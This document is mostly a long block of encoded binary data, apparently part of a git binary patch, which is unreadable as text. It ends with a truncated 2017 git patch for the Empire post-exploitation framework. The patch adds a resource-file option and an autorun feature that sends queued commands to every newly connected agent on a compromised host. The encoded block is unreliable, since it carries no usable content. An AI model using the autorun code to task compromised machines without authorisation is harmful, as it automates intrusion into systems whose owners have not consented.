zO6>6DFeRlDZ!vOCxI3Ph_ontC#19u^WtxB0el!eKdkG05WgDR#((wr&vGNXXuEa^1 zHXk(-SK|dIk@8_0yh6(IpM_>uIY&gwN}<_t%Ok?_4;muND)-n(N%L(7cR^Y;$^IJYQkj<;YJPRHOmUm z;EEASQAXwE2O0VXjuo+7$J22fk@AVi^2CTVkBmz9;L7+ucvi-DLPe`9!KDbVo{1dG zVl_mLCsaApa6)2vZT1ZnQMITKQ)vU%EnSYk=^A7mgOR4qp;zUP-%cy#*SQm zhJC7p_>{fb5ja|fX$J0!GOkGJSth)E-^22*yvj59iZEj?+f#X(Y_;8RgS4HeJSOVuW4={7m} zjW&5FzwQ}~tu{}hNzfkuSX&%b-m7&XhF@d9fTC24I1b;0FmDNY4peoz!-QSvDLOE3 zUu0zuWd-Sk=*xsfWfdv{E-f2LU0Qf$)aTo*LVZpPGZsL7%H12P+#TP~>p=DoSLsbs zv)*virW`~^`aJuNNU328u9SC091Si4wHY*b8v2CQee%j4L||seMVyl=;SxLXQA32! z<3PvZD@2nwOS7F?!6D2`LNgVI?eP8@6nq>M{DFt%JEGv1RU8s&x;uVo&0&jXw{VCj zs0xv#RopydMU*yzo5rrwCWBIV z(b!}uyk|YR)7#x6w|(r}h-)!Y3;gR-kZNuBw{5y+e_Zv?wCO1W{$7$UTB*CN|Evw8Ih)WD%1QIig=>`ZZ-fQrd-N0yom%JB$Maom;Rr^o`@vavyxwkrS9sJNK`fg%;e*3MxcWbu#PJfI3B;Tm!c;>~&PC)= zae!>|ZzX)Nl=V&cU?nq8_~61@O8nRfAH)mv6P|?#hhF3@eurY{_f~4f@NsxrmhZ*% z2Hvtkq?w1ho}{RrbWv?v7gfg*b6OP!7r=G-(!F>Xp=ul8GRYWmVVL$TBl?4BDq^5t zdk1GoMuWYWjbJKTTY*II%S*XH_jmlxEDOg1X zdC5+6Kp;C&+YTYR@RrO{s)JtW7 zcHV8Fn#=pS{~t)WS9@ww#AvpMSfq~y6}#iJwdA@Db%Dfe3qK407oS7m(s*AaOxDB58ITBrY|h zsD`^F*};FAoC|F@OwM<~`NQBYLAaMZ!>e{E!-wS*Cw$94bJFC?JksR9!JCEewxbhE zGKB|;R^gG<**&BE(om5@zt}DkrLJ;>HYVpTz~o$zU=!3d@pYl)nKaLfygegyd3!wJ zPV(Q1&AO^Xg=Xbx{(C}2w)YV{6)HA+EXv@ru-HSY3>7+_;whp~3_{odE`(T(eV@P` zHf=k?TkK2655v1a;q<0Y=d~2F` z2Wqf~T)6Ng{dYP!KRX0#ALmR4idn!@N5mB;qtBfP${HY>*M0l~5kgV<@yjWL$ zzlTV#N_g>^NbeNb21U=U?v_{NXHu}0`nWwbgZNe-Z%=usQ14i1ns_UzKphu*_HD&_ zm*3FnQl(01(5lC083+?GCSp2m6NDbJuomy*6idtGRO)bUz6`F`|bICI5$p?cz#@UJ`T zDvtsTglQ7CFfAV6>+)*ZU z?1@oH-ngjU@8zsoHSry8G1wLs3#o~_IAaFOU1=j$&cO!86;MMlmez7kL0eoh+IJBu zk7E5R;*vBwbMlybgaZ#!1)Wxg%t*r5%=AuSDN~xED8o)yjHh04+DL7Y;~U~HLr=n* z7jc>m=6bMBrVQJ>+Mc3)X=2CY1Y_{!)i5Ia^83U?U_lei$E zCFbCQk=kO;1#mZ5)ol@YxO(D@SsLN<%oh#L99wN|mRDP%)U#@&^XE1b(_xL@at0rS-%B zaH_x;m+XOkS`2$D+)pgAIOV9^UPTBS?!YFLDJwW-unTlkpdDZhK!sgO+Yp8XXyZEB z*{|mGpq7)cc!^B*DUKPaw2zrLP<>~T_H28LQ(dabE0;GgJt4rVaDat-h7aF8V^j?^ z0#SaA_aD$^qJePuD;sNmuEiZ5cN)q$`MtaY7W&D#%JRC-cq>b8R7yHXU0dvh&XWI5 z_NA9UBGkzSO^Vi^u0Q+l<>BnxFL^&wK_<|w2BgvNiz`zS5LQvf ztmJ9?Wsh2jKIoxtIC!5*PNea zqDz^`aQNy_CU)ACiA{%kqw02LEbPC@9YIkh#u}6{%YtebV-Uy_P*nV0yz&Hw-fyF* z4%;az_lXK^5ca_F0da!iI21U%@YF(Z1CA0L8xbdX6vrhTO^6eGjpGvzABdfx$qr0< zV)e$ZU3@laxIFdO#10jUG2J4U0LnF$y=scW@Fg`RyTdBn@or57NSjc^VOod zK?dCnP3k*Ucc^6Pb18j0eM*0YHdDSzJ}UbCLBHoW>5~p`Vx~>C58+YmecMv)?b=Z7 zR~W<){+tPaJ++Y5k7~~{r&`O5SW8w{@Gdi^`?mZ1h^2pWbgV~VsF ztBVfRMb?$-0@_`W-UaCfB;8n-G7izFjD7VeV>^V$wyy_0$X|;x3NfLK?2IWR@Sz{0 zYI9nyhMJUNh!N-;QigBzVpKXOXx6zHBAdQ?Xuma7C)Sd0%FmndNcTDB90YgKB*a0594 zHX{f6{6HP5yKD_)`V(Zj8Zuo$*PFBxk&}t79@SHJkm`w#j`pq z))%^MW7WE<2VK>ry1{03L*M9TL+fgpNe>P5%~4bvl&{IO2VH)DqBGsVTi3tn457cA z@IuRR802X87db8`?PacoHXVd|*r6T*N{^vWwozo35XsWlJ7uB0JQk9p<=S*Zt z>$W3wdnk0<<_rBNv{Fg`p>-Cz3i%jAKE^gGon^Hr{SgOrsXcV5y^TQ(OJ5WHTZhuO zQE84zKU^crfX*+$wMy9jRH|LIicbO22dt{+u?A4u^_tb(7*3#CmjX$-9d)UW=<6NP z*E^1F?wNrq`_cw&20Md()D8Wp+gQfF&^8YC4g3&$4N-jY3(O}{qNvaHpbz9RM;PMS zII3~vZ=t9II4pjns4TpAt{nvX83FwbpeU}CqTXWJ#}yysjiacYc@*^=d6p=#&K!C4 zUQ?7g4hI~bIL6`d!{Lu35JxDENF1>^;&Cj*k%A)w2jPf~mwmaE2Bk@9QQEjO>QZ`G z?bU{AOL_VFh{S%rJ_AA`A}En`s(hL_UM7u-3y+R+j|!KC2StR>k$!c;D_RyFI-3d* zyLtt8Gp;xdp z2R8>YSR=nLM3TjJZjM)Iw1husH;0|q={JYHkMf$s=5Gzv;e?+uJF3I{1BXmhVea8m zU6$IB@P-#>&v!X;*~^(>wI|F)!YkB?mgm59dpwjIxd_40W`wu_v@2FhAVp5ZT zZv6&+nQzXLAwd^EDJLnbdikflzcsCJb>r`S4sWdRzmpK;IUqE)R#JU z_8c=H{^<0>aNX;hV#uFHr%54>_eN)|i856D;dJzJf2qj>zfOBDzILkQnI*e*aVt8W z_tMEZcXxQiR*i#07S%b~4nHtr&f}}A4qtofbmY^g^Fhh&W}V&q$Z4R*mcPEr=W2Y%NK0(nP<2^ z!0GzSff<^IR-|GN!1em|%AMH?O+2$|)CcaO~fSaYKL`lqRrCj2<;u(zV8vDYZ+)K7|KTQyhBZ}-UR?r-NWRdDa*R_PM? z!thZn`0xfHNTz_CaWugRkpLtwy&D6yaqw|0#9{ZO#;dhCFzBO-Tl}EHuCXd4`N>b6 zm(S$Ok5ipL#^ke5WoyotB~YC&VX%zBN(QSLtY=W$T9w~|L3;-M7>r?1U4A?hSM#09 z#4{NzWw3(5Dh8_=q-<2>88awg(3`<927UXg@==y5G+@w}L30Mx^<~8H7f{O~LA#cg zJBAPR@9iuVUA27dHB{#@l%s##IjZw&xs~Xt&Xec9)<3m8Ep$}p)$OIuqn2}38`XKJ z%NIYj{3{s#zP?`FE_{Z*n*Y*x6@T`OTuYeqDy3{G!jC!M$ds?XK8(3u-M)ePD*iN? zOGB9YtJ^)0sXx(W@^fCODnDM`uFUoNs?(J3T-ABCo>VgRQ}b8KoLB45a)v+kd4>#? z$iVhmpZ}G7pELDS_X~CYuTkA!zD`%i8<~Ej-A`2?V+I46{vX3& z0)xvLRQJD{{;KQLaXxc>K7%C;mNHnuU@C*l8LVPZ!thhW#MS&&F#UOng{r(v2J;y# zW$+k-{C28*U*lQkeAVB`SHq+?GN{e)W6WS9!$&@Y+D!e887yVeEtt4HgK9n`Ox%w_ zb^WxN`mSQ^+d2mG87yJ2l)*9vD;cb2u!g}#2D!E>IcPH&)>9QXVB*FM@);B`XwRTC zgAxY)7z|@Dp21WGGa0nEQk5fN(2v0|1`QbGGx)XsSTO0!8Jx$UT5r_(Gnw>!26r-e zfI$nU-Rv1u>zDfaKqftg!2|}EGpH^%nV~0O+Si#uZw4b6jAt-`!Au6#`l8kkb^lZM z7Xj1$YCUmQ_Xh^O8T4Z?jKO#Y)pAkyrz|Eti>XHmgJld>GI*Q88V1$ntFfNZQ;Mm- zT5js{DwuRNRx!V=$G$EC$OMtY(lJ$k1WXnL$4WV;D?jFpI%b z2CEpXXV8GLV-^fLGZ@CyH=e;%1~VDVXRwq(b$_m4;#CZ)d8&)|qbnD}cF#;dMP z1^xn`O+3Q|T6XW|5yaCDAdPtryUn^3-CoUu0i-Ma9s*ygKM*aZ&Oh|(*Fc1lqeHn;zN794DE?L&w-bg ztK?Y)Y*+yvUP10FDQd(jl!ZJJ;E2_zHwgn@{RF-cZUlD4tDOCj-yB%97ChI(R|k~f zEr@!gdjm~>Q^}wB`Br2>N06QgEZu;-2$uo%H>z}_JwXQie@RWF;|sN!AH0SM?CTnf8o2$kSoG}0*i~mBjF9WVT-E1#P`^Lt14^<3}eDE zz+bk32k2N9@W&mHGs2m`t2l^W8SkX1F}omJg#Ca^a1hBPfN=;3z>j8R&<(tSbnw1D-z#9YpvF(5XVDClX*J4$>E7 zK+!3cOgwXQ5*VzXf`pM;?TIflWBP5!Su{x>wMT5xxz~zo`nB0E-_` z)I6l`1ir(Oh47!i-j9(F;r_rp9LEqY0a`v$h3$YTIEWm`TqBuZj6j$mnOh`bf@EHi zgb9*4MG_|HQ={wK$O-tHm2Ntz_5Q{1$6D7>ga2Sg!!TaO!t}c{x?Y>X(+oah@H2zDj;eee8MI;0nZW@}K0hWdV{iq7xeOj) z@EU{98DukjIWu&;7@Wjl6oZQx{E0ztHC-lN$e_A@`CrwyAKHfe>=<-ra3q6%3{GV* zg26cqCNsE-!F3E4GPs+;BTTt`CfKVh(n!P5+uF}Rz-A_lV+ zVK9tAb^V_~@5rx`!2=9#WH6mU8G|7Vx-w|PU{3}O8KfAjCM!PhyTsrj2DdP{ioqlX z;~5NOa4ds^88l?@9V4$Y25&P+7luFo(tDNM5By8-X_ffDqW9l%Lt~{4B_ykukK(%9KP zv*TpaNO$CnjSP}u0vls=^|@B5LNXmqZTrR<@7U;IX$wnQ2fL#!v|c6DT_A92 ztjs4o#5ejYK8~w%`+y!TwF~ML-|$E%5>=>};X~>xJms<=kl3e=yGOf3N5(`*>4K+nLBmVtBMXwr<9wq< z(Q)F~*yvcwn2kiKtd*qIEmcC-Eht7NkCmc|GHJYw8cnEpL`Tn%$GFO)=qib$WU-LM zc*5iO@K~8VC}LdHtnjE1ii(n9;RCJmi`iJq;29kvkC3WXG)%zrDtBy9c$`!mA1sYg z$>spbMT!@OV1Waag*waeAUaLAAMVzw7-@Z~FUjj7kBx=Y)EqBlp?gYIf>J3g3FAqL z|K{lh8on@7;Ze|Nbs?}Jqvf&~xr|<-qT&Qx zI&tZq?=6j`JAG6zv_K9uh^6}dRrc;7)PPp0s@{r3suQV!Z+P$w`eKS2B_8V~_OP{4 zS;9P)N|}Vg!Gt!t&;-(BrPJu5#|K5op&vwIBuyM8k3_E{38^Gb1jWRcHD5y%8Hu=N zw)z^HjF9ppak@!K*APd`XE#&)*BakxpLtlOS`TGoJl8UtUFGnH)R(9Z&AM_$$U;+J|zdMpIshyW_7b z!sK_5`|7i5t(GR77WHOWDNLgieHK0t{9`j=HM~Ot3-n~zC^VdkqNagbI5vZmf^rnT zI)p(1b&1X+pzJ6C<$%ME8iBvCZP==xMY$kPB-Zf;A^&V}6NDJd5q_Sa6b!o2R2+^_ zl)iom-uQoF7aLplonB;I9Dx22j>Wv!(1&V?Jd; z%>uP3!~#$XMlkewl5+_152CD)+Xgv@P<=tm25aP4v<+n&D3KZffGCm=^ zs`yI)MHZwgMNLR(=~xZAoZ|aInyuf>4&ahAkQo-zWMCynZw% zM2{jEj#S!8K8I35GN^v&@N}Qg^2-X$LXtCli2&jsC8b!P{}^QRvn{d(*^+GUY`^T7 z?D*`2?9}Y#*_qi{+4h$nlz`MDOk&bg9Yzudswu-t^))ZEP6 ztla$E(%iD#irlK)>fD-K_@Dzcjxrzaqafzbd~vzb3yvzcHUG z&@M12FfQO1SQH2f><3fI+MWLY3zR@6R8v%6)L29nYZn_7 z8yEA7Es6!j_QlS{l49>-zv95+u;Q5F_~L}()Z*pEnZ;Sf`Nbv0rNw2%6~&dsRmIiC zHO2MCjm1#?fBpW~N}$3Kth3paAjxsRrcS>_l0^+|SX%6?B*!8o<+E8VYdwLEriNu( z4!g4kCGgPHwbaB507*mGEN<3!f?Pu6N?_XRI&OP&32$&DHPZ)}`KGPtDE9O6p)GNaAJ*k~pbZ95##1)(tW_yAoyxi@F7En)zXApyb&!Bb;$u zO(XU=A8R8)J55BijdUjj#f9PdR2Cg&Z6Ih%619x9#!5pXqoYEsy9>IK6kVeZp5ei< z(Q(nCGQLZ6Y)o`4{g7;JCNL%EIYymZpAV7peZr?jfhynIMJVXrsg1R@wZK|nBe1ox z88it|TLBW7s31}C-@;oPfga&a&xq?e+Iy_JDxAMj6+sfKXKR_UG$>9Ii-(qF>9Uhp zEb8UtL-X62KU}0)9oi(>)#)Jn(N2Av`q=O04_JKNYs0oYmw^q^_15=oti@ZdmzyV> zULUY4dBKN4mwmck-#w=L=<}g_>-OlgKlPnboWJ

7F~U9@dusksh-w`1-5#?zPKY z%tIz!UOaz!q+`*{a}x&7uQ^~az9_Rk&3{11iLJeLzV9B~;q~yt9hd!_%04RCQ?3`- zgBN@D+MfJDhKts2(9?aga`Ms-zU#_=HwhS#Vfb4&r{#P47%5C_lDhqVWAPQ!?ZYiDTd17OoxGE++WSv%7__BTcymKDPU}k3N3iXS-19 z7B%GEf!ehlg+I<1Fj;Vv4b^0AN@8_`L`(!m5N)?!Tz!GArZzNMLqm(h5p*MoZMhw} z?YoR^`+K{7d&<&|wo4p-E{^PP zJok#lK%)l}r*}D`XSXN))3d#+o@-e@nf_MJy_|RR`=Ofa4L%jLIk;|&OLWt;RqO6w zm{)IJGU%+r|K-iH=)vw~lXNG%i@U%6_lMdZj^7PDd+FTE(LG}txINgpqt=!#o08gg z@Tv$~t539Etfp?^dMe z5Wk;2XFFHg`A_P#Wm;VqFIUZyC4GBrGFX;l`%YYgn9_;{8)e*Lqln+c3cjMqm}Uz_w8Oy$_Gys4%0k&SM+J#H{#!Wv%0l%K z^n${}V0Djj36BYr#_~lzV!qhNYpClW8))#5Aw#U}g+m5g_Y#i|3GgMTtWXkG<>t1@p53g}KI_hEIv~~kop88c6T?ZOC-_^_Z9&4DY=Q792 z>7^tp^yH6EIH#kY&n}p5w)WiA_2;H%J3Zax(lpg=!_Ix85BHqQQ+yZHWaagDFO7v zs39n|x9v{16Is5g9W49H)fP<$lG12pyav{|R)k%S8oixgc{k1LwcATc`I|3{m6=`R zjj^sVx-XnR&iuH;vgGKX9Xx@r%2>fv31F(S#EV@1UB*gvb0vC7t0k-!ZL0j#rU|AB zhDsn&$6>05{bQ!;o0MhWvf$cZbx7KJ#Wl?z@awsZRLgnuAAaBAhuW~I_1e2##vhw9 z(kiU#y`ZQf&SuxilsZ|#YP(RIXth~(?0aS)yrzH|F-TLPhBj&TczH!f={fu*V+o454ivC+{OV&OJJ zrdQy^1a@WZ>UVsdC$Nso99h;kBsm#yBbT~8Z<#S?erGD z``h}kBF|A7IR|Ht`eCh`*3D17?)@rHy-*k@T6jJ2*6#=349-3^MSOc}@$hPkur;0Y za$@7gzwWf^(WgPHVzaKz4Cp>ftVpr%SQ$52W8bu~89Cd-2i`Q%`@BNd_rc78zIWOS zCN^HmnEL6=sQ_1N@4bDD9ytpx#P&6?=y`I8*YGTx;mgl$u-8nP;x#_WqMwG%o>A9F z2S2@JHTAW4_|qb7Y&gDQ{l&>kdi&JODIEF6^}>*0_Um`fnv&CLea4w~%f=5YFVYF% zTvnT!?_p{t33$X*7?FXHhJXWTWqZCk4kF{&Zagw-Vl5IFYU(hL5FJ=t4Vo}+2hC}0 zGW_~<(c0^B@ATF8GXov-t)p{?9jLMrm^5c<&*tiP*M)OM4)>W0CH%s;wJk~tbROSl z&EsB1fA+ht>$7^|qilh<%DA};+yvq*mn`8Tr+?hIHS2pUR67`&O&c~}wIPFHlL%Y| zB6S>w&HmqG*hq&V{RLG2I{IR>sEH2WE$r>OwJzFuo6WB2b!`Vm<-0f31;}4`I9gqI zDc1XZrq;@OliAsM-kAxe{zbzFdhFYnKYrcAnEj2&*ZG* zTYb>;J~sZG)x(jO4#YgoZ?ln;Grqbsebj_Et4FMR{rjtz4;S^Y8&*30mwF$wlz!Ps zT~|I>rPb}t1Fyy<8&204<^1SX(dE*z*wy`hh+Nybv1`50wP|O2HcjbvZsU@JeYVdI z9xvKB=G^<*O@8C=tYwQu0|VaP+;Sz!ChE`Z)kcr%!k-pw?0=}j(x9z$>CdHGE!Q$-3B!zek)de;%`G!iov=S7l^%k#Ht8T-Y>CSC%vQh1I}L6;EP^ z7`~0(Hf&nb`?1?IY&%N3w@trea5v;_^m*4Smpj$YKE~a7`D6ckJ<`_~>3%fo<6Qjc z{r!T4uKTqD-K2reUL_-*d%f5(b9R-kola!e1nV9T+WOvkyy4?xH-qAk%qH)S1Lhsp zFrD*YwXje4(Ur?qpUS9OYr3V)ly&tRw=4=%=ufxWKXV4v?Wf{59p}F5s4(A~dSQCL zoAtn7Za@5C_;qT*RJV)gQ%{u|e`p(rtq~tJut{O*g3>o``Xdrf+S5X z*zZ?r``s~&xYV&+@}FV91w#aO0vPZ?wgLxYzpd%0t$;-TdBfj-%X&W9D6a{*JMiIq&7gyo(;iG6BC`oz_*~)g9bdbs4c@OXd_o@0-+& znz;v`r)lvT+H&zId$z|JTl2-gzIi*XYyUszK27cR?5WqL4drG&r!zi?FX&W$zqPVt z1b5^6+=!Lau3Ox8^(k3Y`PjmBK%b&TqsNWaf5hqkar*M*f~dv6PZa$6VZpUEJ8DeV zENHxB^t<*RpUAO0#mj$_P$S(!+x6)in!o1JWzEEq8{a4AwR3B)lk{8ii*fOvS-*7i z)=r@e1gdyS(< z_dmyR&%Kt@E?Tc(S$) zko_<@Qr~Fv`9pJ;l@7RKxN%A3)Y1v;GhTcn@1O6?aegpi|5m?Wy58@`T2!<@{*AH{ zOBY{0IJ8Vxqas7{px&p$oza_DJbIcj{c1w_lT~jt2c~dpf9z-8Gv?#FKOe>aJfKa3 z)`OS>#$LZJouM1Mx^#oXx@lI&$FzMmb&6BROeNpxfmUam_h+p~&a@tG8LL#vt~s`FAVJU+HYE2DU(^9blbPRbhCZt zAH(*B`t7h9`1F0sqO)Vh*Zdl@Dx%22Ch*f4}W z+-mE@Wu=cyAMYwT9lSH%SL2FsfOpZVlAQR>JFK`)o>Jx6Wkc16f$N)?0@Dw&FYa*(FqbfQ8PqJ|6d089Ye%UOV7)`-otP{mSW^?Bg~SztPavFz=Th zAWZZdeqHd?_R=cfEnS|q>pgU5b-P!Ko`;6romXSMUh%s7h2yd*Q(k!WNgcm#WAe6p z*4*|3I$dl!mU7skfX~^&zbL)f$ zKW|%|9l-wM#U)LraX&c5`x!nA2)Mb?DUJK*lticHr|lOxZ%8uB5hSs@w6u(-brM@2 zN!qjuru@@x`B1NK#AYx?GXh)NNqfCLAy!)x7)PL6G_wDt!8y8qCo6%ZD;2b3?V#vAhfFE(-XVcCi!;|~o`>a~<#xP)d zR+!k! zT{mgJA?q=3mg%AXx7|kN^!T*F$?ek<`@7#YrLk_TuM1d+>g~Zt+Fm?LT;LS+n8UuNv>1oxeM_N1nZ* zPx9iTn->!YK6%sk!ImMvA3r`rT<_|z_D%P<8EH<9GH?vO?d+o@`;*}N;b%z{L@SQVi-gR7kWxmUVO|Lr+dMHRTO={_rT$Xi` zX)MyBnq^HUlS~7UG#M&m%_AZVTqI#hIb1e+nP5uG#h6ec&g{QAp+q|@T3yTKFE$uc z8Bj7{lk1;%4^G*3#(G+h^#Sh&9zLILHTB12b6!|hl3o`$Z#QB1tW*!5HQdM1!)LwL zjj0Dt7W}ukNG$}tF+75+vqy`I1b+Q5CYbodb=!KD$!?I1U8`B9K_vRWWR~edw!k`Z zOvgo!$DOqc-2IcdZ-C`1?d(g}I$8dHUZdo3tV{OU7i*_Dc7N2aw%^20>wbuh=l5UR z**>wma&q?6-#i#-uC@8s=Bvm^o07xS7x0@PUk#n z|F*WOVDOe%?TZi8|MBFeUHzNWqvx_q0Ck#Ct?-LE;Ox=nea$ZdP}oipWyRB9V~wOY2o5EmHVfLu$`4X4_SV{ zcN1$??9E1gjRr(`Kb63~%7W>2tbyEe| z+xWg6J9clsp<|yN6L*Fkw=d~7z{%in_)(9~3jJR*J>qqL+V8z{sOO3|94E`wE6-Hi z7(3k4c!o*uNuQ=ncOJE+;rhgcAxMuZ+ZXw1 zfWEn(gXh?Y>5pz`-qTK)EcC(Wyvlv8+nhO4ldT~#NI5Bdzh7g)*reoer(m0hqwYT<6~$?UC%KwrNXRktarL5fqy3T zE;(5ce6K16Px&!0ReowSr9ak#HdCChge6E!{co{T@WiU@RNodm^|xKQEfz}vkHBCX zcmb@35P!fRRdf)E{?je$zvULFZ5!e}d)lsJ4?pQp9_v>XHH;5?CaSt{+;4P2&dhm{ z;(eDLR_x5~{{Fo*=~1Uk%RY(LY1c?sp6@>{`S5)0hXXA0g_g#9HjavN_n6T^>+Z!% zN7B0gu-dlI#LapabZC@l94)QR}Jv4UmAGtTHm3op{*HYZB8tgq$Q}|Lj-AZFh;EA36 zCa*K=8X$hyxqbKOA!kf%6Q-wmZkiq%9KZ6a;KJ%2YFmYyIP0F^uTSo@%LIwP5);SgCaxAFt`H36 zS7wBh1b0Gb*{cbo`_4VqF(tm#`*P1eb$%^MTGMFP)UW@V)rOBB9lmgQWyM3gf?J8D zx4Tn^E)9y_`gq~&)w3S6ue`3SI_K5BOVGw6lgv8TFUg-eMm$aXq0_MLD;otVohlrh zbFa7EVcPd`&W7+MJy)KUWj@{D=JLj;sEj8FU-y^B4tMjY z==f^ex`luC9Oa%K)!||8!kLpV`po_@<=3m1ZVitc^!ufZ_88GEj}@6LducDciJplvev3@=gSLyF7Nt2{6ls}E-TM`THFQC(Yx{CD5 z2K><7d26QhRL`0broGa;S_R%1k|s>+*O7NUXxOT-z_G8cx&54#;QX>f;;ir1Rr?rs z_U>lCdTsYmTcbV>o#Gb{KJRrjVEZ4#-F$XeKfa|GG`!#S75&c-ne?6W2UA|eqYN^)TUO$L7YfgW1<-|R+Uw)Dww@&JCLXgzq2>mR# z@ksZ@*u2$9KP&MDmV4={-2*0EYj_@6|8ZBtz~-kD9jCEj%9v^6J#2Q*Dvoyjf9!VXF~gx}Q1+6^C5;yve#?v3s=m=HE#S)Op!<>1 z?)i6veFFL!xUcSY^uBvs&$3xdv-Hx7r#5W(kjv}e`18>5=9^DyogY*wy}~&aUhB4Q zXnXe`m0K?SIHp^}x`n%rT+~(Ae;o1d)~mO>w`jdG==AxS$F80Fo^6#wbq_CZKe9v5 z-y$4tC6 z@RgshR<*7m=dZGeOjIM z>fq4Z<5GWAoRtsXG{e|@e@Vhz*OQ!9)C9xantmUv$8gIk>$bcZ3GJW-d!!YKI5 zhf*$o;*-92<9}OO5x1amu0!oFVb3D3T5Wtc3CYf?nKWxd#%qaQlV+A`AE5O|V7b{zVi_pqOG(!9juD!`hYI_Vr(jPD+ zov0p?>Lm7~hotPU?j`>dhosgv*8g95R~`;k+lL3qI@!Zm!fPGm%!meAn^I(rELn!h zTGkXzVuma;uSj;KELn=IDKTDDWLG3h_O+yBOSXImueR&`>W}YxulMWv{yWckuJinH zuJfGx{@uU(K1WtwZr!T6K}o^kp7kN%`?rv1Q9yW;Jo9}a&)+(6#!_aX-w!vqy3B>IwdIDB8}dtoEN776VZUQ1JI`v^O}UF3SkV=6mxLK zR5KWPk>AV4A<~*)RL~N2?-n`vg(n zw!m`LdzbQilQTKxBn=%kgJ(?FwyQY!&)Zj0#iISDo@%eUjwaR@WX<5<^oaM}y4xe~ zh0@Bs^5M;YozS#zTn1g5IoETd{3b<}09}+%(+at=4sB_*^BM)Uo{-KKAsqvE>Cg`e zX**WYf`qs{yZ^lJL7r+^NAn;T;~yCW{vQcx@&+MYcWL}WoRnrP)BrkEGZ3#z@Ssvo zN=p%RD|(aBIFINJB^- ziivYx<{ZJU>sIl}ktfX`>TwV^Z2&DSw6EnYReEfMnFRUX>b61m8%Qm&RpUIFPxnT{ zWy@@>6JMIBy`FAPu)iF(=4|WVTdlb@oa3$f0ZeKK5H z2d^#it)M!i=W5dFV}oy&Ux(#x(+Dgn#$Ode2^5Qro|s&itMJ2`i7?@IE0~;3^|-yA z#6;X#YLm&*kl49HGZA0?v?=rH)P=zJgGwHB{gz(wLbNvB`TG2B<PH;`BW_Qd+Bxhn@ONs-E=$m8*?oI?K=sOTE`g{M;xR za*HYT?kQ-pzFhYdofvO>k)IqtZE3gs%QowXKCjTjtRUb#1LfKWTcATTp|Sxw%-@5~ zKl>(Mj|8k2mkJ=x$jPotA7CV4-EfQ8vp)PaK_7hU{y0LAQy5uPCEHm+9VZ;lD?Kpj zAw?Fy(IS1=cyOw0Ww=T+EG*@uIMXNDblE*{2(#9A0;rQ&NXAZdZCsQpc26hO9Zc=|Elg2lL0?Ej5$D zxO|>Bol#t3$040$17Mh2>7I_V8~FE$rEKR=3*T&t{gX{{-pCNHxK`EdVuopBNmc_? ze3yy4L5F9Y`L!8t4!qrnRcRuOye6XZAa_+yR`U5cqspphrMVJCK<1OBU@cp z-?8t?PCbKj-|{t~YK!*l>hFhHm6dOF~<){6LVsT}`i?eBHmpZONH#N99-sYw}i z%pW~@ugGROed7E%Ar3N*S6rRMCEA5!nD1-bK7VDFsYf+icPSG(cA}G-Y@`*Ocjt-~ zN5-pEFNUn>B}naE`CW8Z**c!-tM?r(CAeSPH{sfG0D10gy*jGe@U{6;oGp5+$eCI= zNv|Q5W;l$!m~NL@A>665N)5v>3``!%SNc7ZOXLCUlg(wB#034wIa{*9zTQ3p8 z)Ey7Yp9h?Co3muAiuGCfudby;fE~ooPKk|rHJKg&+wTxcs-44_l&xc$6oIc1ax1!% zG%#5R{Xi}Jv_az3Qu4yAk2__?#VQskuS@Vyyh4i2^=M;Y$BC@Ihp?9>+pxCd_A~cg zhEf%rOb3-?JC5pda?PAsFw`D5z`^To#;owZnZ4*$EXf)(c&ux;fd|ZJgo=`R#h-ak z>AT-P>h!;pYIrpAy!W^&cW|fB+IhoEc1ZU5TG~*DBWIEVu^;o>a-(-!eB>s+C}#@1 zTpxa#e`1l*hdtz7&|-NJs-V8Ml?G?lRaTa!(BzI>i^@yH$nddCDPHA_K2GmGQh!)q z$xnXAG6^pjZ+8qIOJw6_&@ZW<-tpQqf{k7RsUuq;`{6Vu`?fCbhMLS9&NvB@MmrX? zD}d@YW&g&`BmJ}GA1H8r!)Cq~xB@670N7`319Z+nzfmuM?-eUM9YCl72#)|l);9LP+OnWz4G{1*{r-pU z5oiK(y~@}e7O$AN6kk^xkVWzyB4UYOKj$FAth+EYlXJS(wA_PL+pizg;t1ts!@W#< z>!Yf`4iz-Sj`H3QDqLxT)Z16TEx$eWJOQz0tYWW5h!#Jkl>he4p~`{VqoWFIPZAv} z#$)6PjfqrhJkm{4;s(Zg&#O^H@wDhh$C3MchV&Y4^y;TH!!^gx9&~>kh~8^LZ)m5S z9T2AFbT4=nuW{v)0(_=N{mvq>l_gY+`l@6=KStE@GP%!qbgBDL?h=k@nkm%E9!FlS zJdcl5h8WggI{b>xDc>%G==cKOcULDamGF*!$U-U5)C!KiAimsYq(TM9^+ni6z;FoI iIpTRd%a!h(Lk2QT3<3NP Date: Mon, 16 Oct 2017 09:55:48 -0600 Subject: [PATCH 15/50] add autorun feature to agents menu to run all commands in a resource file on incoming agents --- empire | 1 + lib/common/agents.py | 16 ++++++++- lib/common/empire.py | 81 ++++++++++++++++++++++++++++++-------------- 3 files changed, 72 insertions(+), 26 deletions(-) diff --git a/empire b/empire index 3d5d6dd..65a59d1 100755 --- a/empire +++ b/empire @@ -1239,6 +1239,7 @@ if __name__ == '__main__': generalGroup = parser.add_argument_group('General Options') generalGroup.add_argument('--debug', nargs='?', const='1', help='Debug level for output (default of 1, 2 for msg display).') generalGroup.add_argument('-v', '--version', action='store_true', help='Display current Empire version.') + generalGroup.add_argument('-r','--resource', nargs=1, help='Run the Empire commands in the specified resource file after startup.') cliGroup = parser.add_argument_group('CLI Payload Options') cliGroup.add_argument('-l', '--listener', nargs='?', const="list", help='Display listener options. Displays all listeners if nothing is specified.') diff --git a/lib/common/agents.py b/lib/common/agents.py index 505a858..351d162 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1343,6 +1343,20 @@ class Agents: if autorun and autorun[0] != '' and autorun[1] != '': self.add_agent_task_db(sessionID, autorun[0], autorun[1]) + if len(self.mainMenu.autoRuns) > 0: + autorunCmds = ["interact %s" % sessionID] + autorunCmds.extend(self.mainMenu.autoRuns) + autorunCmds.extend(["lastautoruncmd"]) + self.mainMenu.resourceQueue.extend(autorunCmds) + try: + #this will cause the cmdloop() to start processing the autoruns + self.mainMenu.do_agents("kickit") + except Exception as e: + if e.message == "endautorun": + pass + else: + raise e + return "STAGE2: %s" % (sessionID) else: @@ -1399,7 +1413,6 @@ class Agents: TODO: does this need self.lock? """ - if sessionID not in self.agents: dispatcher.send("[!] handle_agent_request(): sessionID %s not present" % (sessionID), sender='Agents') return None @@ -1417,6 +1430,7 @@ class Agents: # build tasking packets for everything we have for tasking in taskings: task_name, task_data, res_id = tasking + all_task_packets += 